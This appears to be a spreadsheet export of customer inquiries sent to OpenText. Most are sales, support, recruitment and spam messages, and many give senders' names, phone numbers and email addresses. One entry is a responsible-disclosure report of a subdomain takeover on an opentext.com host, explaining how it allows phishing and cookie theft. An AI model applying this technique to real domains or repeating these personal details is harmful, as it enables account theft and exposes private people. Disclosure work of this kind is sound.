    <t>I'm the IT Admin for my office and one of the employees here uses Redact-It 2.2 for redacting. However, after finalizing PDF files, if he attempt to open the finalized PDF with Adobe Standard/Pro in order to make changes or edit the document, it seems as though Redact-It has somehow messed up the formatting of the document. For instance, if he tries to change the header of a page, the word is stretched out across the entire page. When I tried editing a document with a slightly newer version of Adobe Standard, I get an error message about the font style not being available. Are we unable to edit documents after they've been finalized in Redact-It? Or is their a setting that needs to be adjusted in order to allow us to make changes after finalizing?</t>
  </si>
  <si>
    <t>I want to purchase plan for knowledgebase access. I have corporate account. What if I want to have my own personal email address associated account?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi my name is, Connor J Ryan._x000D_
_x000D_
I work at Lisa Shamai Cuisiniere. Summer is here and we’re heating up our grill to our new delicious summer menu. Check out some of specialties like our Jerk Tilapia with a Strawberry Kale Salad, the options are endless with our enormous and diverse menu. We can accommodate almost any dietary needs and expose you to a variety of different foods and flavours every day.  _x000D_
_x000D_
I can send you our summer sample menu and a little more information, or visit us on our website www.lisaskitchen.com for even more options._x000D_
_x000D_
Sincerely: Connor J Ryan_x000D_
Have a wonderful day._x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking at integrating a reporting tool with my web application such that it allows users to create ad hoc reports using the web application. I want the reports to be interactive and to be created through the web application through simple drag and drop.I believe the iHUB tool along with the analytics designer tool will help me achieve this. Could you please give me some information on the costing plan for iHUB and analytics designer tool?_x000D_
_x000D_
Additionally, could you please give me a detailed feature list for both these tools?_x000D_
_x000D_
Thanks,_x000D_
Krish</t>
  </si>
  <si>
    <t>Hello, i want to download directly  to FTP, i don´t know how, do i need special FTP program?_x000D_
thanks</t>
  </si>
  <si>
    <t>Hi, am looking for Opentext archival solution release notes to check the compatibility for storage systems _x000D_
Regards_x000D_
Morad</t>
  </si>
  <si>
    <t>The Town of Whitchurch-Stouffville has just gone to market for an enterprise document management solution with a Request for Pre-Qualification.  If you are interested in pursuing this opportunity the bid documents are available through Biddingo at https://www.biddingo.com/townofws._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>We are using an outdated scanning software EMC Captiva QuickScan Pro. I contacted them to see about upgrading and they told me they sold off that part of the business to you. I am looking for a quote on new document capture software and a demo to make sure it is compatible with what I need. Please let me know if you are able to provide this._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hi there, _x000D_
We are an IT hardware/software reseller in the national capital region of Canada. I was wondering if we could sign up with OpenText as a VAR. It would be great if you could offer some guidance. _x000D_
_x000D_
Thanks very much_x000D_
Kris</t>
  </si>
  <si>
    <t>Could I please be provided with the contact information of your Facilities Manager or Property team for your Reading offices?</t>
  </si>
  <si>
    <t>Is it possible to embed code into the footer of a template that would update on save, the document number and version(1111111v1) for Word documents?</t>
  </si>
  <si>
    <t xml:space="preserve">license moddels </t>
  </si>
  <si>
    <t>Launch Exceed 14x64 in Windows 10, I got Fatal Error:Cannot open default font. It has no issue in Windows 7. Please advise. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
i would like to ask for Indicative pricing and  price collapse for OPENTEXT Content Suite platform cloud edition for the following sizing. _x000D_
_x000D_
SIzing: _x000D_
Company in Czech Republic_x000D_
Used products: Archive server, Contents server, document pipelines_x000D_
Number of active Users: 600 users_x000D_
Size of stored documents: 20 TB_x000D_
Datatransfer per month (Users &lt;-&gt; DMS) : 90 GB_x000D_
Services included: PREMIUM SERVICES BUNDLE, BUSINESS CONTINUITY BUNDLE. _x000D_
_x000D_
Thank you very much. _x000D_
_x000D_
Regards_x000D_
Jan Chaloupka_x000D_
Head of Support_x000D_
  _x000D_
IXTENT s.r.o._x000D_
from documents to knowledge_x000D_
  _x000D_
Prague Marina Office Center_x000D_
Jankovcova 1595/14_x000D_
CZ - 170 00 Praha 7_x000D_
  _x000D_
Mobile 	+420 602 767 806_x000D_
Phone	+420 222 363 653_x000D_
E-mail	Jan.Chaloupka@ixtent.com_x000D_
Web     www.ixtent.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I'm Senior Editor at Forensic Focus (www.forensicfocus.com) and I'd be very interested in interviewing a representative about the recent acqusition of Guidance Software. Is there someone I could talk to about this? _x000D_
_x000D_
Many thanks, _x000D_
Scar </t>
  </si>
  <si>
    <t>Hi,_x000D_
As part of an in-house proof of concept, we are trying to assess how does Salesforce integrate with RightFax and what APIs could be leveraged. Towards that, I was wondering if I could get some guidance on how this could be achieved, including any reference documentation or a trial version._x000D_
_x000D_
I have provided my desk phone here, but may not be able to take a call right away. But, am happy to take on any questions you may have. At this stage, this proof of concept is only an inward facing exercise, to build capability in this area._x000D_
_x000D_
Thanks,_x000D_
Manu</t>
  </si>
  <si>
    <t xml:space="preserve">We have an developed reports using birt. is there any way to schedule the same </t>
  </si>
  <si>
    <t xml:space="preserve">Wir planen bei der ECE – zunächst nur im Bereich der Rechtsabteilung (ca. 50 Personen) – die Einführung einer neuen Software. Wir wollen unsere Arbeitsabläufe digitalisieren und optimieren und suchen daher nach Softwarelösungen in folgenden Bereichen:_x000D_
_x000D_
-	Dokumenten- und Vertragsmanagement (bisher NSCALE)_x000D_
-	Dokumenten- und Vertragserstellung (bisher HotDocs)_x000D_
-	Fristenmanagement_x000D_
-	Informations- und Wissensmanagement_x000D_
_x000D_
Wir haben intern bereits ein Anforderungsprofil erstellt, welche Features wir gerne nutzen würden. Dieses möchte ich Ihnen aber nicht einfach vorab übersenden, da sich die Inhalte vermutlich erst verständlich ergeben, wenn man unsere Ziele einmal gemeinsam besprochen hat._x000D_
_x000D_
Daher würde ich gerne einmal mit Ihnen besprechen, welche Lösungen Ihr Haus anbieten und klären, ob Ihre Software für uns geeignet wäre._x000D_
_x000D_
Ich wäre Ihnen daher dankbar, wenn Sie mich einmal dazu anrufen würden, damit wir die Themen einmal besprechen können._x000D_
</t>
  </si>
  <si>
    <t>We are an M&amp;A Transaction law firm in Germany and we are seeking for a smart DMS. We would be grateful if we could have a demo session. Many thanks in advance</t>
  </si>
  <si>
    <t xml:space="preserve">Not able to send the submissions to the FDA as they have updated SSL protocols ( TLS 1.2)  and Cipher suites  ( TLS_RSA_WITH_AES_128_CBC_SHA (0x2f)_x000D_
 TLS_RSA_WITH_AES_256_CBC_SHA (0x35)_x000D_
 TLS_RSA_WITH_AES_128_CBC_SHA256 (0x3c)_x000D_
 TLS_RSA_WITH_AES_256_CBC_SHA256 (0x3d) ). we would like to understand how the changes need to be taken care in Bizconnect to support FDA without affecting EMA and swissmedic submissions ._x000D_
</t>
  </si>
  <si>
    <t>I am heading RPA Automation CoE in Birlasoft and currently we are pursuing RPA automation for FTE reduction. Here we expected to read hand-written/digitized claim forms, cheques and unstructured letters and grab meaningful information for further processing. We are interested in extending partnership and want to explore OCR/ICR capability and seeking assistance in following areas:_x000D_
•         Trial version of your Document, Text &amp; Field reader for POC creation_x000D_
•         Pricing model _x000D_
•         Assistance/training to fulfill our needs_x000D_
_x000D_
Regards,_x000D_
_x000D_
Nitin Arora_x000D_
+91-9953605686</t>
  </si>
  <si>
    <t>Dear Support,_x000D_
_x000D_
I need quotation /price for documentum 7.3 developer._x000D_
Can you please share the details._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Vivek</t>
  </si>
  <si>
    <t>Want to buy documentum7.x</t>
  </si>
  <si>
    <t>I have just joined News Corporation Australia and tried to set up an account with the above email but I keep getting error messages. I tried to reset my password but got another error message saying password update unsuccessful. Can someone help me set up an acocunt?_x000D_
 Thanks, Jacqui</t>
  </si>
  <si>
    <t>Are you HIPAA compliant? We do a *lot* of volume, and are looking for a new vendor.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I understand you are dealing with Data Center/IT Decision Makers. Wouldn’t it be great if you get an access to network with decision makers interested in your services? _x000D_
_x000D_
To name few: C-Level Executives, IT Leaders, Data Scientists, Data Warehousing, Data center Managers/Architects/Designers/Developers, Network Security, Engineer, Business Analyst, Consultant and Operations etc.,_x000D_
_x000D_
Please let me know your ideal customer profile in the below format, I will get back to you with counts &amp; pricing details with few sample contacts for your review._x000D_
 _x000D_
Target Industry: _____??; Target Location: ______??; Target Job Title/Designation: _____??_x000D_
_x000D_
Appreciate your time and look forward to hear back from you. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">As you may know, on May 26, 2017, PPG Industries, Inc. (“PPG”) and Nippon Electric Glass Co., Ltd (“NEG”) entered into an agreement for the sale of PPG’s U.S. fiber glass business (the “Business”), including PPG Industries Fiber Glass Products, Inc. (PPG’s wholly-owned subsidiary that primarily conducts the Business).  The transaction is expected to close in the second half of 2017 (9/1/17)_x000D_
_x000D_
In connection with the transaction, PPG intends to continue to allow the Business to use the software that PPG licenses from Opentext during a transitional period following the closing of the sale of the Business._x000D_
_x000D_
Please let us know if you have any questions regarding the above._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Karen Grunebach_x000D_
Manager, Strategic IT Vendor &amp; Asset Management_x000D_
Vendor Management Office_x000D_
Corporate _x000D_
_x000D_
One PPG Place 6x5_x000D_
Pittsburgh, PA, USA, 15272_x000D_
Tel: 412-434-3270_x000D_
E-Mail: grunebach@ppg.com_x000D_
Web: www.ppg.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Received 4 fax calls on you work number that interrupted our day and we would like them stopped immediately. </t>
  </si>
  <si>
    <t>In the mid 1990's I used Gupta's SQL Windows for 2-3 years while team-developing a new product suite. I found it to be an exceptionally well documented and reasonably powerful product for getting up quickly._x000D_
_x000D_
I am now retired and want to prototype or possibly write a windows  staff modelling application and remembered this development tool._x000D_
_x000D_
Is it still available? Would cost be prohibitive for the a one-person scenario?_x000D_
_x000D_
Thanks in advance, Richard Dill</t>
  </si>
  <si>
    <t>Hi,_x000D_
I had an interview on Thursday, 03.08.17 at the Opentext office in EGL, Bangalore for Software Engineer role. I was called by Blesson Cherian. I have forgotten the name of the interviewer._x000D_
The interviewer seemed angry for no reason and said that my answers are wrong, though they were correct. _x000D_
In the end, he told me - "Go home, study the basics and apply elsewhere. With this level, no company would give you a job. You don't know how to explain things." It was all rude, prejudiced._x000D_
Please remove such people from interview process._x000D_
I am posting it on Glassdoor too.</t>
  </si>
  <si>
    <t>Hi,  I have requested information before regarding OCR activation on our existing systems.  I have not received any more information as yet. _x000D_
_x000D_
I would like to confirm the costs etc of activating it.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam,_x000D_
_x000D_
At Alliander we are using the Content Server of Opentekst for some time now. Recently, Office 2016 was installed on my computer. However, the version of Enterprise connect we use with Alliander is not compatible with office 2016 (on windows 7). The IT department apparently is not able to help me with this problem. Is there a version of Enterprise connect that is compatible with windows 7 and office 2016 which I can install?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Thijs Boersen_x000D_
Business Analyst_x000D_
Alliander_x000D_
</t>
  </si>
  <si>
    <t>Technical question on Documentum capability for handling large files.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
I have left 3 messages on the main number without a response.  We are source seeking for the services below and would like an onsite presentation with our team either on Monday or Tuesday next week.  The committee is very interested in your company and would like to seek pricing from you.    I am having extreme difficulties in making contact with your sales team over this type of product.  Please help._x000D_
Vendor Demo General Intent Statement:_x000D_
_x000D_
AECI currently has an initiative to explore Electronic Content Management systems for improving our document retention, discovery, and lifecycle management. Currently we do not have a defined enterprise solution, instead relying on human process, file cabinets, a collection of workflows and a 2010 SharePoint solution. Phase 1 of our project has been to define our document retention policy along with the different retention periodicities of document types. Now that we have this defined, we need a system to facilitate and enable. To provide understanding of the overall ECM segment’s current capabilities, we are requesting 5 vendors to come on site to present a two hour demo of their solution including its capabilities, integrations, and best practices. Areas of interest involve capturing documents, document lifecycle management, signing documents, workflow, security management, integration with line of business systems/SharePoint, email management, metadata process, and searchability._x000D_
</t>
  </si>
  <si>
    <t>Marie BERNABE_x000D_
15 rue des roussettes_x000D_
78520 Limay_x000D_
Mail: Mariec.bernabe@gmail.com_x000D_
Tel: 06-01-44-16-48_x000D_
Candidature Assistante en ressources humaines en apprentissage_x000D_
Madame, Monsieur,_x000D_
Vous recherchez une assistante en ressources humaines dynamique et motivée, alors ma_x000D_
candidature peut vous intéresser._x000D_
Mon expérience durant deux ans au golf de Bordeaux, les diverses missions effectuées_x000D_
ces derniers mois en Suisse et mon année dans une agence immobilière ont prouvé ma_x000D_
capacité d’adaptation et m’ont permis de developper de nombreuses compétences._x000D_
Mes voyages, mon expérience, ma disponibilité et mon envie de faire évoluer ma carrière_x000D_
seront aussi de nombreux atouts que je pourrais mettre à votre disposition._x000D_
Mon rythme d’alternance et de 3 jours/ semaine en entreprise et 2 jours/semaine le jeudi,_x000D_
vendredi à l’école._x000D_
J’aimerai aussi mettre au service de votre entreprise, ma polyvalence, mon relationnel et_x000D_
mes compétences administrative qui définissent entre autre ma personnalité au travail._x000D_
Par ailleurs, j’ai appris dans le cadre de mon activité auprès de clients exigeants, à faire_x000D_
face à de nombreuses situations de pression ou de stress. C’est pourquoi, je pense être à_x000D_
la hauteur du défi, capable de m’intégrer dans votre entreprise._x000D_
Je me tiens donc à votre disposition pour l’entretien que vous m’accorderez afin que nous_x000D_
approfondissions ensemble nos motivations communes._x000D_
Dans cette attente, veuillez recevoir, Madame, Monsieur, l’expression de mes_x000D_
respectueuses salutations._x000D_
Marie BERNABE_x000D_
_x000D_
ASSISTANTE RH_x000D_
COMPETENCES_x000D_
❖ Transmettre les candidatures et effectuer des entretiens pour stage_x000D_
❖ Réceptionner les appels téléphoniques et renseigner les clients_x000D_
❖ Gestion des plannings, prise de rendez vous_x000D_
❖ Négocier et finaliser les ventes_x000D_
❖ Gestion du courrier_x000D_
❖ Rentrer les mandats sur les sites_x000D_
❖ Tenue des registres de l’agence_x000D_
❖ Etablir les devis et transmettre les données sur les modalités_x000D_
❖ Suivre les éléments de paiement des commandes_x000D_
INFORMAT</t>
  </si>
  <si>
    <t>Please, can you change our address? We moved last year! _x000D_
_x000D_
Our new address:_x000D_
RENORY SA_x000D_
rue de Renory 478_x000D_
B-4031 Angleur_x000D_
Belgium_x000D_
_x000D_
For info: our old address was: Sart d'avette 110, B-4400 Flemalle_x000D_
_x000D_
Thanks_x000D_
_x000D_
Annick Renard</t>
  </si>
  <si>
    <t>I am unable to send or receive e-fax. I have recently changed my email ID from manisha.gundi@in.ey.com to manisha.paul@in.ey.com</t>
  </si>
  <si>
    <t>Would like to find out about the functions of Documentum.</t>
  </si>
  <si>
    <t>We are currnenly using Captaris Alchemy and would like to upgrade to the newest version of the document management software to install on our new virtual Server , could someone please make contact to discuss this_x000D_
_x000D_
Regards_x000D_
_x000D_
Tom Jones_x000D_
Commercial Director_x000D_
0113 256 3721</t>
  </si>
  <si>
    <t>Looking for P2P solution connected to SAP ERP systems.</t>
  </si>
  <si>
    <t>An opportunity for working with your company as Intern</t>
  </si>
  <si>
    <t>One of our clients (Lidl) use opentext for the HR website. We are taking over the management of the website and we want to get a staging version of Opentext setup. Is this possible and if so what do we need to do?</t>
  </si>
  <si>
    <t>we are looking for local distributors. Would like to take prices for a requirement.</t>
  </si>
  <si>
    <t xml:space="preserve">I have found severe vulnerability on your site. _x000D_
_x000D_
Vulnerability name: _x000D_
Subdomain Takeover using secureix.opentext.com pointing to Azure_x000D_
_x000D_
Summary:_x000D_
Your subdomain secureix.opentext.com is pointing to Microsoft Azure service domain .cloudapp.net. However, your previous Azure VM has been cancelled. This basically means that anyone can claim your subdomain pointing to Azure and create their own VM at this URL. This is EXTREMELY dangerous as whatever the attacker want can be placed on this domain. This is also a foolproof phishing attack since no one would be able to verify that this is not a legit secureix.opentext.com form._x000D_
_x000D_
I have temporarily claimed this domain for PoC. You should immediately remove the DNS-entry for secureix.opentext.com pointing to Azure._x000D_
_x000D_
And since I'm able to run javascript at Azure, I'm able to do whatever I like on that domain. Creating a login form that would fool anyone, since it's present on a opentext.com domain, or steal session cookies from user, if they are set for .opentext.com domain, even via HTTPS, as attacker can easily generate ssl certificate using Let's Encrypt and steal user session cookies set for .opentext.com domain._x000D_
_x000D_
Fix: _x000D_
remove CNAME secureix.opentext.com pointing to Azure .cloudapp.net immediately _x000D_
_x000D_
PoC:_x000D_
$ host secureix.opentext.com_x000D_
secureix.opentext.com is an alias for secureix.cloudapp.net._x000D_
secureix.cloudapp.net has address 13.84.227.94_x000D_
_x000D_
PoC URL:_x000D_
http://secureix.opentext.com/_x000D_
_x000D_
As you might understand, this is really bad. Foolproof phishing. XSS on opentext.com. Potential malware spread through a domain you - in this case - do not control. Extremely painful for the company brand. Please make sure you're always going through your DNS-entries so no subdomains are pointing to external services you do not use._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> This is for our client Msheireb Properties: Part No.: 373-BP-M: Annual Maintenance Brava Enterprise viewer PIN 405094	Coverage Starts from 1-Oct-17_x000D_
</t>
  </si>
  <si>
    <t>The Presidency uses Metastorm E-works 6.5 as business process management software. Metastorm Works 6.5 is integrated with the Open Text EDOCS 5.3.1 which is used for Document Management and Records Management. Metastorm E-Works is used to manage Correspondence Handling workflow within the Presidency._x000D_
 _x000D_
The Presidency needs to get into an agreement or service level support and maintenance of the Matastorm E-Works solution._x000D_
 _x000D_
The support services should include:_x000D_
·         The resolution of errors by way of Critical support and General support._x000D_
_x000D_
·         Disaster recovery support services in the event of a major System failure, the service provider will provide the Presidency with reasonable guidance and assistance as to the best possible approach and/or method to restore operation of the system within the shortest possible time; it being understood that time is of the essence._x000D_
_x000D_
·         System and process-related advisory services._x000D_
_x000D_
·         Any other agreed services necessary for the better performance of the Metastorm E-Works._x000D_
_x000D_
 _x000D_
Remote access is not allowed, consultants should be onsite to perform necessary support._x000D_
 _x000D_
The quotation should be based on 120 hours._x000D_
 _x000D_
The contract will be valid for a period of 12 months._x000D_
Billing will be by way of invoice submitted monthly for the number of hours worked for the respective month</t>
  </si>
  <si>
    <t>To get good opportunity in your ccompany</t>
  </si>
  <si>
    <t>Can't find contacts Moscow office o distributors</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a low cost on-premise OCR solution that can read Vietnamese characters to scan AP invoices and send index file (could be.txt/.csv format) to post in SAP. </t>
  </si>
  <si>
    <t xml:space="preserve">Query to use open text brava as HTML viewer. </t>
  </si>
  <si>
    <t xml:space="preserve">We are a Bedding supplier to John Lewis and as per requested by the John Lewis buying team, we would like to setup EDI link with John Lewis and allow John Lewis to send us orders._x000D_
_x000D_
Our system already has EDI facility and capable of receiving EDI orders in EANCOM Order Segments._x000D_
_x000D_
Please let me know how should we work with you to achieve this and the cost etc… Thanks!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear HR manager,_x000D_
_x000D_
Hi,this is Sumika Ito from Daijob Global Recruiting, Tokyo, Japan._x000D_
I am writing to introduce a little about our service, Daijob.com._x000D_
_x000D_
Daijob.com is Japan’s biggest job posting website and a recruitment service aiming to help global / internationally related companies and agencies to recruit highly qualified multilingual mid-career professionals since 1998._x000D_
_x000D_
Our user base consists of about 500,000 global candidates and over 2,500 new users register on our website every month._x000D_
_x000D_
More than 4,500 companies across the world are already working with us and we hope that you, too, will find our services efficient in the process of recruitment._x000D_
_x000D_
We offer different packages, which makes our services highly adjustable according to the needs of our clients._x000D_
I am sure we can find a solution perfectly suitable for you._x000D_
_x000D_
Please see our brochures listed below to get more information._x000D_
_x000D_
1)Daijob Brochure_x000D_
http://go.daijob.com/brochure_en_x000D_
2)User profile_x000D_
http://go.daijob.com/userprofile_x000D_
_x000D_
If there any additional information you would like to specify regarding our services, please do not hesitate to contact me._x000D_
I will be more than happy to be of your assistance._x000D_
_x000D_
I am looking forward to hearing back from you soon._x000D_
_x000D_
Have a nice day!_x000D_
_x000D_
Best Regards,_x000D_
Sumika Ito_x000D_
</t>
  </si>
  <si>
    <t>Wie is de opvolger van Collin Brockhoff als account manager voor Documentum voor de Vlaamse overheid?</t>
  </si>
  <si>
    <t>Dear Sir, We have a customer inquiry for Exceed and Exceed on Demand. The customer is asking if you have trial version for them to test. Please advise how to apply trial version, thank you.</t>
  </si>
  <si>
    <t>request MySupport access right for search product information._x000D_
I have try to request confirmation email for mysupport,but it not work after I click the confirm registration._x000D_
please kindly help to check for this._x000D_
thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to put people based in the UK on the following courses. Please can you let me know what the options are for attending these in Reading or across in Europe in the next 3 months?_x000D_
U-TR-2-0106 Content Server Information Administration               – _x000D_
U-TR-3-0187 Content Server Installation &amp; Configuration               _x000D_
</t>
  </si>
  <si>
    <t>Set up EDI</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,_x000D_
 _x000D_
I sent and email to apactraining@opentext.com last week but had no reply._x000D_
_x000D_
I have a question regarding training. I am looking at purchasing 1 x 9-9900 OpenText Learning On Demand Subscription_x000D_
1 year. Does this cover all of your e-courses you have available?_x000D_
 _x000D_
Also I would like to pay via Purchase order but in order to do that I will need you to complete our supplier application form, If I send this through is it possible to have it completed and sent back?_x000D_
 </t>
  </si>
  <si>
    <t>Please provide price quote for the following requirements:_x000D_
Background:_x000D_
_x000D_
Defense Health Agency (DHA), Vision Center of Excellence (VCE) uses Computer Software (as defined in FAR Part 2) licenses from Actuate for the BIRT Computer Software to support the Defense and Veterans Eye Injury and Vision Registry (DVEIVR) program by providing an analytics and data visualization platform.  This Computer Software (OpenText BIRT) was integrated into the DVEIVR system following an extensive development process which included extensive integration of the Computer Software and also developing custom software code._x000D_
_x000D_
 _x000D_
_x000D_
VCE has the right to use these Computer Software licenses for its OpenText BIRT program for three more successive option years beginning September 28, 2017, and ending September 27, 2020.   Option year one for its use of the OpenText BIRT licenses expires on September 27, 2017._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
The Government's requirement for this proposed contract action is twofold.  First, VCE requires an analytics and data visualization platform to support the Defense and Veterans Eye Injury and Vision Registry (DVEIVR) program.  Second, VCE requires a dashboard feature to more effectively meet the requirements of users of the DVEIVR program.  The proposed contract action is to acquire (1) the Computer Software licenses from Acutate Corporation to use its OpenText BIRT Computer Software currently supporting the DVEIVR program by providing an analytics and data visualization platform; and (2) the dashboard feature that would expand the capabilities of the OpenText BIRT Computer Software to more effectively meet the requirements of users of the DVEIVR program.    _x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
The required period of performance for this contract is:_x000D_
_x000D_
 _x000D_
_x000D_
Base Year:            28 September 2017 - 27 September 2018_x000D_
_x000D_
Option Year 1:      28 September 2018 - 27 September 2019_x000D_
_x000D_
Option Year 2:      28 September 2019 - 27 September 2020_x000D_
_x000D_
To be considered for this requirement, the contractor must cle</t>
  </si>
  <si>
    <t>Partner Program, second request.</t>
  </si>
  <si>
    <t>Would like to schedule a demo of - OpenText Document Presentment for SAP® Solutions</t>
  </si>
  <si>
    <t>Need documentation on Captiva .NET modules.</t>
  </si>
  <si>
    <t>VC Formula One Grid. Are you still support this component. Can we buy this component and it work as it on Windows 10. We do need a version which work on Windows 10 operating system.</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have the workgroup version 10.9 Teleform and would like to know who you would recommend as a reseller for the version 11 . We are looking for an upgrade to our current software. Please contact me as soon as you can . Thank you </t>
  </si>
  <si>
    <t>Looking for a secure solution so our users can send and receive faxes from either their desktops or citrix applications. Wanted to download a trial version to do some testing.</t>
  </si>
  <si>
    <t>We are exploring new cataloging options that will enable us to integrate digital assets. Can you give me the names of clients who use these services? Thanks</t>
  </si>
  <si>
    <t>Looking to replace our on premise Fax server with Cloud or Server.  We have 150 lines with monthly volume (total) of 1500 faxes totaling 2500 pages. Looking for low price pricing options.</t>
  </si>
  <si>
    <t>Assist with RightFax driver for HP Color LaserJet Pro MFP M477 printer. We are currently unable to LanFax with this printer but believe that we should be able to do so.</t>
  </si>
  <si>
    <t>Hi - Our customer ID is 185254.  We are interested in purchasing Gupta Team Developer version 7.0.0.  Could someone please contact me to draft a quote._x000D_
thanks!</t>
  </si>
  <si>
    <t>Interested in ECM and business process automation</t>
  </si>
  <si>
    <t xml:space="preserve">I'm interested in learning more about ProVision software. I've used it before and Boeing and I'm interested in possible using it here at Vulcan. </t>
  </si>
  <si>
    <t>Status of Maintenance contract</t>
  </si>
  <si>
    <t>I'd like some support on our RightFax server and virtual print driver.  We are having continual quality issues with images / colors being extremely distorted on the recipients end and unreadable.   _x000D_
_x000D_
Thanks,_x000D_
Brett Scherrer</t>
  </si>
  <si>
    <t xml:space="preserve">When trying to access my support resources at support.opentext.com I always get a message stating "Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us."_x000D_
_x000D_
I have generated the confirmation e-mail multiple times.  I always get the e-mail and click the link in the e-mail, but this does not fix the problem.  I have contacted the individual (Rick Robinson) in our organization that administers our contacts and he believes he has my account set up correctly for access to support (e.g. support tickets).  He advised me to contact OpenText support to try and get this resolved.  _x000D_
_x000D_
Please advise.  _x000D_
_x000D_
Thanks, _x000D_
Mark Camper_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Pourriez-vous nous un faire un devis de renouvellement Documentum ?_x000D_
Ci-dessous les informations produits :_x000D_
_x000D_
Qty	Numéro de série	Modèle	Description	Stard Date	End Date_x000D_
 	 	 	 	 	 _x000D_
 	 	 	ENHANCED SUPPORT	 	25/01/1900_x000D_
 		 	 	 	_x000D_
26	148945115	456-106-924	xCP User Unlimited Applications=UA	18/03/2016	17-Mar-18_x000D_
26	148945114	457-101-904	Documentum Platform 1-50=UAx	18/03/2016	17-Mar-18_x000D_
1	 	M-ENHHWK-001	Legacy ECD Enhanced	18/03/2016	17-Mar-18_x000D_
1	148945113	456-107-273	Documentum Platform=UA	18/03/2016	17-Mar-18_x000D_
_x000D_
Client final : Mutuelle UNEO_x000D_
_x000D_
Dans l’attente de votre retour,_x000D_
Cordialement_x000D_
Laura_x000D_
</t>
  </si>
  <si>
    <t>Need to obtain latest Feature Pack for MSO2016 compatibility</t>
  </si>
  <si>
    <t>DID YOU ANY RESELLER/REPRESENTATIVE IN EAST AFRICA AS  WE ARE INTERESTED TO ACQUIRE  THE SOFTWARE AND HAVE NEARBY SUPPORT</t>
  </si>
  <si>
    <t>When I sign into the online support, I can't get into MY Support to enter a new ticket.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
we have discovered that our company is registered twice in your data base. Please remove: Forbo International, Lindenstrasse 8, Postfach 1041, CH-6340 Baar and keep the following (new postbox-no): Forbo International SA, Lindenstrasse 8, Postfach 1339, CH - 6341 Baar_x000D_
Thank you for your support and kind regards_x000D_
Sandra Meier_x000D_
Commercial Allrounder_x000D_
Forbo International SA ¦ Lindenstrasse 8 ¦ Postfach 1339 ¦ CH-6341 Baar ¦ Switzerland_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Topic-Inovis_x000D_
1) Is there any manual (soft copy or link is fine) to Inovis?_x000D_
2) I need to set up an instance in a QA environment.  _x000D_
     a) Is there any additional license fee?_x000D_
     b) Is there anything specific I need to know before doing so_x000D_
_x000D_
Thanks sooo much!_x000D_
      </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je travaille dans une startup qui développe une solution qui a pour but (entre autre) de s'intégrer avec la gestion documentaire de nos clients._x000D_
Un de nos dernier clients utilise le produit Documentum qui aurait été repris par OpenText._x000D_
_x000D_
Nous aurions besoin de discuter avec vous des possibilités pour avoir un accès à la solution Documentum durant notre phase de développement ainsi que le cout._x000D_
_x000D_
Suite à un appel au Siège de Paris la semaine passée, on m'a donné le nom de Jeremie Azerot mais en mentionnant qu'il était en congé pour le moment. _x000D_
_x000D_
Notre délai d'implémentation étant relativement court, sauriez-vous lui faire parvenir cette demande ou à son remplaçant ?_x000D_
_x000D_
Merci d'avance pour votre réponse._x000D_
_x000D_
Bien à vous,_x000D_
David Rochus_x000D_
_x000D_
Email: david.rochus@rocdasys.com_x000D_
Tel: +32 496 06 28 89</t>
  </si>
  <si>
    <t>I need to know complete details and suggestions about the classroom training for SAP OT VIM/Xecm, the convenient location where the course will be offered and its overall cost per head._x000D_
We are in the business of implementing SAP OT different modules with our external partners and we need our consultants to be trained enough to cater client specific requirements.</t>
  </si>
  <si>
    <t>Enterprise Connect application in Windows Explorer freezes when I press the shortcut, but the Web application works fine. Please advise.</t>
  </si>
  <si>
    <t>Dobry den,_x000D_
meli bychom zajem o program "BRAVA! Desktop TXL". Jde nam primarne o porovnani technickych vykresu v PDF formatu._x000D_
Chtel bych se ale zeptat na veci ohledne licenci a jejich navaznosti na instalovany pocitac. Pocitace se nam totiz meni kazde 3 roky a neradi bychom kupovali software znovu._x000D_
_x000D_
Dekuji predem za info._x000D_
_x000D_
S pozdavem Jiri TOSOVSKY</t>
  </si>
  <si>
    <t>Looking for software download link for latest version of Capture Center for evaluation purpose.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, our company has been using BPM for years and we were able to create a ticket in the past. It seems that I personally can’t do that. When I click on Open a support ticket link, it leads to “No Access (We're sorry, your account does not grant you access to this resource)” error massage.  My account is confirmed. </t>
  </si>
  <si>
    <t>Looking for open opportunities for web developers with regards to HTML, CSS, JavaScript, PHP and SQL. Regards.</t>
  </si>
  <si>
    <t>Hi, I would like to try the trial version of opentext ihub16 on Windows 10. I received the following username and password by email: username: administrator, password blank but can't log in!_x000D_
_x000D_
Also, what are the limitations of the trial version and is there a free version? What is the pricing for the commercial version?_x000D_
Thanks</t>
  </si>
  <si>
    <t>RESUME - Bilingual English and Portuguese_x000D_
_x000D_
GRACIELLI ELY – MARKETING SPECIALIST _x000D_
 _x000D_
 _x000D_
Adress: 0, Encantado Street_x000D_
Dez de Maio – Toledo – PR – Brazil_x000D_
